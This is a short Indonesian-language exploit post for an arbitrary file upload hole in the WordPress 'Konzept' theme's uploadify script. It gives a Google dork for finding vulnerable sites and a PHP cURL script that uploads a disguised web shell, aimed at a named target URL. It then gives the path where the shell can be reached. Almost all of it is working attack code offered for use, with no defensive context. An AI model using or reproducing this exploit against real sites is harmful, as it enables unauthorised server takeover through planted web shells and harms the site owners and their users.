Hello sobat :v , Yo yo yoooo :v wkwkkw Oke langsung Tancap men gak usah Cincong :3 :
- Exploit Author : NULL_Pointer
- Contact : https://www.facebook.com/xenith.gianni
- Date : 19/09/2014
- Vendor Homepage : https://github.com/nzajt/New-Life-Office/tree/master/dev/wp-content/themes/konzept
- Version: 1.0
- Google Dork : inurl:/wp-content/themes/konzept/
- Tested on : Linux, Windows 7
<?php
$url = "http://Sidoarjogetar.co.li/wp-content/themes/konzept/includes/uploadify/upload.php"; // put URL Here
$post = array
(
"file" => "@namashell_dalamjpg.jpg",
"name" => "namashell_setelahdiupload.php"
);
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;
?>
- Location Shell :
/wp-content/themes/konzept/includes/uploadify/uploads/NameYourShell.php
Credits :
Faizal Affandy | Extreme Crew | PhantomGhost -
